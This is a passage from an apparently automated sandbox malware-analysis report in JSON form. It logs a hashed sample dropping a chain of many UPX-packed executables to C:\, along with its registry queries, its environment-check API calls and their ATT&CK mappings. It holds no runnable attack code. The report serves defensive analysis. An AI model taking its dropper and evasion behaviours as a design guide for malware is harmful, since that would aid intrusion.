\"c:\\nrdphjv.exe\"\n \"nrdphjv.exe\" writes file \"c:\\rpbpdxh.exe\"\n \"rpbpdxh.exe\" writes file \"c:\\408802.exe\"\n \"408802.exe\" writes file \"c:\\6644862.exe\"\n \"6644862.exe\" writes file \"c:\\848862.exe\"\n \"848862.exe\" writes file \"c:\\22202.exe\"\n \"22202.exe\" writes file \"c:\\lvlfrln.exe\"\n \"lvlfrln.exe\" writes file \"c:\\vrdnrx.exe\"\n \"vrdnrx.exe\" writes file \"c:\\6248060.exe\"\n \"6248060.exe\" writes file \"c:\\062080.exe\"\n \"062080.exe\" writes file \"c:\\086880.exe\"\n \"086880.exe\" writes file \"c:\\4424228.exe\"\n \"4424228.exe\" writes file \"c:\\42866.exe\"\n \"42866.exe\" writes file \"c:\\600468.exe\"\n \"600468.exe\" writes file \"c:\\66206.exe\"\n \"66206.exe\" writes file \"c:\\280282.exe\"\n \"280282.exe\" writes file \"c:\\0488840.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"CWDILLEGALINDLLSEARCH\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSAPPCOMPAT\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\TERMINAL SERVER\"; Key: \"TSUSERENABLED\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"COMPATDLL\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"00060101.00060101\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\SORTING\\VERSIONS\"; Key: \"\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\GRE_INITIALIZE\"; Key: \"DISABLEMETAFILES\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\COMPATIBILITY32\"; Key: \"4F9033A1DD9C370C05B3F56B058CBEBBE32CC72E5F709B4C55A6FD121C9F158F\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\WINDOWS\"; Key: \"LOADAPPINIT_DLLS\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"AUTHENTICODEENABLED\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\APPCOMPAT\"; Key: \"DISABLEENGINE\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\SHELL FOLDERS\"; Key: \"CACHE\"; Value: \"\")\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS NT\\CURRENTVERSION\\IMAGE FILE EXECUTION OPTIONS\"; Key: \"DISABLELOCALOVERRIDE\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "binary-0", "type": 8, "relevance": 3, "name": "Dropped files", "description": "\"2824064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"686826.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4460482.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"60026.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"0628066.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"422622.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4284246.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xdfpfx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"rhvphd.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"xltnrpf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"vlrlrxl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"bdjjvlh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"4060084.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"084822.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: N/A]\n \"jhftx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jhftx.exe]- [targetUID: 00000000-00001728]\n \"4602048.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4602048.exe]- [targetUID: 00000000-00004620]\n \"822462.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- [targetUID: 00000000-00004212]\n \"8024206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8024206.exe]- [targetUID: 00000000-00003580]\n \"664222.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\664222.exe]- [targetUID: 00000000-00003800]\n \"6264048.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6264048.exe]- [targetUID: 00000000-00003800]\n \"666086.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\666086.exe]- [targetUID: 00000000-00003064]\n \"thbfpv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\thbfpv.exe]- [targetUID: 00000000-00003064]\n \"ttnbl.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ttnbl.exe]- [targetUID: 00000000-00004536]\n \"ptfff.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ptfff.exe]- [targetUID: 00000000-00004536]\n \"xrtxff.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xrtxff.exe]- [targetUID: 00000000-00003976]\n \"brbjvx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\brbjvx.exe]- [targetUID: 00000000-00003976]\n \"xrfrdxf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xrfrdxf.exe]- [targetUID: 00000000-00000900]\n \"ffpprbb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ffpprbb.exe]- [targetUID: 00000000-00000900]\n \"vtxfp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vtxfp.exe]- [targetUID: 00000000-00003248]\n \"xjjln.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\xjjln.exe]- [targetUID: 00000000-00003248]\n \"ttrtrr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ttrtrr.exe]- [targetUID: 00000000-00002528]\n \"ldjdlxp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ldjdlxp.exe]- [targetUID: 00000000-00002192]\n \"fxpnhnj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fxpnhnj.exe]- [targetUID: 00000000-00002192]\n \"fhjvtn.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\fhjvtn.exe]- [targetUID: 00000000-00000984]\n \"tfvnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\tfvnr.exe]- [targetUID: 00000000-00000984]\n \"jplfnb.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jplfnb.exe]- [targetUID: 00000000-00004524]\n \"bjjnnr.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bjjnnr.exe]- [targetUID: 00000000-00000500]\n \"dvfrj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dvfrj.exe]- [targetUID: 00000000-00000500]\n \"620206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\620206.exe]- [targetUID: 00000000-00004048]\n \"04620.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\04620.exe]- [targetUID: 00000000-00004048]\n \"8204220.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\8204220.exe]- [targetUID: 00000000-00002676]\n \"220440.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\220440.exe]- [targetUID: 00000000-00001952]\n \"206020.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\206020.exe]- [targetUID: 00000000-00001952]\n \"848682.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\848682.exe]- [targetUID: 00000000-00003744]\n \"nvlntp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nvlntp.exe]- [targetUID: 00000000-00003888]\n \"dvlplh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dvlplh.exe]- [targetUID: 00000000-00003888]\n \"jxbtp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\jxbtp.exe]- [targetUID: 00000000-00003712]\n \"dhfjp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dhfjp.exe]- [targetUID: 00000000-00003712]\n \"08246.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\08246.exe]- [targetUID: 00000000-00002228]\n \"288226.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\288226.exe]- [targetUID: 00000000-00002536]\n \"6620064.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6620064.exe]- [targetUID: 00000000-00002536]\n \"bnrrj.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\bnrrj.exe]- [targetUID: 00000000-00004304]\n \"ptvbh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\ptvbh.exe]- [targetUID: 00000000-00002820]\n \"0488840.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0488840.exe]- [targetUID: 00000000-00002820]\n \"280282.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\280282.exe]- [targetUID: 00000000-00004236]\n \"66206.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\66206.exe]- [targetUID: 00000000-00004236]\n \"600468.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\600468.exe]- [targetUID: 00000000-00003768]\n \"42866.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\42866.exe]- [targetUID: 00000000-00003768]\n \"4424228.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4424228.exe]- [targetUID: 00000000-00002780]\n \"086880.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\086880.exe]- [targetUID: 00000000-00002560]\n \"062080.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\062080.exe]- [targetUID: 00000000-00004348]\n \"6248060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6248060.exe]- [targetUID: 00000000-00003912]\n \"vrdnrx.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\vrdnrx.exe]- [targetUID: 00000000-00003912]\n \"lvlfrln.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lvlfrln.exe]- [targetUID: 00000000-00004260]\n \"22202.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\22202.exe]- [targetUID: 00000000-00004260]\n \"848862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\848862.exe]- [targetUID: 00000000-00003396]\n \"6644862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\6644862.exe]- [targetUID: 00000000-00003396]\n \"408802.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\408802.exe]- [targetUID: 00000000-00004168]\n \"rpbpdxh.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\rpbpdxh.exe]- [targetUID: 00000000-00004168]\n \"nrdphjv.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\nrdphjv.exe]- [targetUID: 00000000-00004308]\n \"dvrdf.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dvrdf.exe]- [targetUID: 00000000-00004308]\n \"4404242.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\4404242.exe]- [targetUID: 00000000-00006140]\n \"0228060.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0228060.exe]- [targetUID: 00000000-00004128]\n \"824686.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\824686.exe]- [targetUID: 00000000-00004124]\n \"802862.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\802862.exe]- [targetUID: 00000000-00004124]\n \"0020002.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\0020002.exe]- [targetUID: 00000000-00005940]\n \"lnvjpll.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\lnvjpll.exe]- [targetUID: 00000000-00005988]\n \"dhxhp.exe\" has type \"PE32 executable (GUI) Intel 80386 (stripped to external PDB) for MS Windows UPX compressed\"- Location: [C:\\dhxhp.exe]- [targetUID: 00000000-00005988]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Anti-Reverse Engineering", "identifier": "static-5", "relevance": 10, "name": "PE file contains zero-size sections", "description": "Raw size of \"UPX0\" is zero", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"IsWow64Process\" with parameter \"5920\" - (UID: 00000000-00005920)\n \"dhxhp.exe\" called \"IsWow64Process\" with parameter \"5988\" - (UID: 00000000-00005988)\n \"lnvjpll.exe\" called \"IsWow64Process\" with parameter \"5940\" - (UID: 00000000-00005940)\n \"0228060.exe\" called \"IsWow64Process\" with parameter \"4128\" - (UID: 00000000-00004128)\n \"4404242.exe\" called \"IsWow64Process\" with parameter \"6140\" - (UID: 00000000-00006140)\n \"nrdphjv.exe\" called \"IsWow64Process\" with parameter \"4324\" - (UID: 00000000-00004324)\n \"rpbpdxh.exe\" called \"IsWow64Process\" with parameter \"4168\" - (UID: 00000000-00004168)\n \"408802.exe\" called \"IsWow64Process\" with parameter \"2508\" - (UID: 00000000-00002508)\n \"848862.exe\" called \"IsWow64Process\" with parameter \"4200\" - (UID: 00000000-00004200)\n \"22202.exe\" called \"IsWow64Process\" with parameter \"4260\" - (UID: 00000000-00004260)\n \"lvlfrln.exe\" called \"IsWow64Process\" with parameter \"4192\" - (UID: 00000000-00004192)\n \"6248060.exe\" called \"IsWow64Process\" with parameter \"4348\" - (UID: 00000000-00004348)\n \"086880.exe\" called \"IsWow64Process\" with parameter \"2780\" - (UID: 00000000-00002780)\n \"66206.exe\" called \"IsWow64Process\" with parameter \"4236\" - (UID: 00000000-00004236)\n \"0488840.exe\" called \"IsWow64Process\" with parameter \"2820\" - (UID: 00000000-00002820)\n \"bnrrj.exe\" called \"IsWow64Process\" with parameter \"4304\" - (UID: 00000000-00004304)\n \"288226.exe\" called \"IsWow64Process\" with parameter \"2228\" - (UID: 00000000-00002228)\n \"08246.exe\" called \"IsWow64Process\" with parameter \"2868\" - (UID: 00000000-00002868)\n \"dhfjp.exe\" called \"IsWow64Process\" with parameter \"3712\" - (UID: 00000000-00003712)\n \"dvlplh.exe\" called \"IsWow64Process\" with parameter \"3888\" - (UID: 00000000-00003888)\n \"206020.exe\" called \"IsWow64Process\" with parameter \"1952\" - (UID: 00000000-00001952)\n \"8204220.exe\" called \"IsWow64Process\" with parameter \"3224\" - (UID: 00000000-00003224)\n \"04620.exe\" called \"IsWow64Process\" with parameter \"4048\" - (UID: 00000000-00004048)\n \"bjjnnr.exe\" called \"IsWow64Process\" with parameter \"4524\" - (UID: 00000000-00004524)\n \"tfvnr.exe\" called \"IsWow64Process\" with parameter \"984\" - (UID: 00000000-00000984)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001c00c8be1c00c3be1c00000000000000000000001500000000011ce312000000000080f0120095e1aa77b2281700feffffff435cae775059ae77aa000000b8000000c2be1c00c0be1c00a4e41200dce81200000000000000000000000000000000000000000000000000001a0000000015001c5cad7760d89c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edae77eabe1c00a06a847586000000a4e41200dce812000000000086008800a06a8475a4e41200916c8475eabe1c00a06a8475a06a847514e9120002020000 (UID: 00000000-00005920)\n \"4f9033a1dd9c370c05b3f56b058cbebbe32cc72e5f709b4c55a6fd121c9f158f.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005920)\n \"dhxhp.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005988)\n \"dhxhp.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001f00702f1f006b2f1f00000000000000000000001700000000011ce312000000000080f0120095e1aa77c12d1700feffffff435cae775059ae77aa000000b80000006a2f1f00682f1f00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000017001c5cad7760d89c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edae77922f1f00a06a847586000000a4e41200dce812000000000086008800a06a8475a4e41200916c8475922f1f00a06a8475a06a847514e9120002020000 (UID: 00000000-00005988)\n \"dhxhp.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005988)\n \"lnvjpll.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005940)\n \"lnvjpll.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000001e0058b31e0053b31e00000000000000000000001700000000011ce312000000000080f0120095e1aa7792531700feffffff435cae775059ae77aa000000b800000052b31e0050b31e00a4e41200dce81200000000000000000000000000000000000000000000000000e0190000000017001c5cad7760d89c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edae777ab31e00a06a847586000000a4e41200dce812000000000086008800a06a8475a4e41200916c84757ab31e00a06a8475a06a847514e9120002020000 (UID: 00000000-00005940)\n \"lnvjpll.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005940)\n \"0020002.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000006900a03069009b306900000000000000000000006100000000011ce312000000000080f0120095e1aa7772511700feffffff435cae775059ae77aa000000b80000009a30690098306900a4e41200dce8120000000000000000000000000000000000000000000000000000000000000000001c5cad7760d89c75ffffffff1700000054e41200240000000300000044e9120070ee1200dce812008600000080e4120096edae77c2306900a06a847586000000a4e41200dce812000000000086008800a06a8475a4e41200916c8475c2306900a06a8475a06a847514e9120002020000 (UID: 00000000-00005896)\n \"0020002.exe\" called \"RtlGetVersion\" with parameter 000000000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005896)\n \"802862.exe\" called \"RtlGetVersion\" with parameter 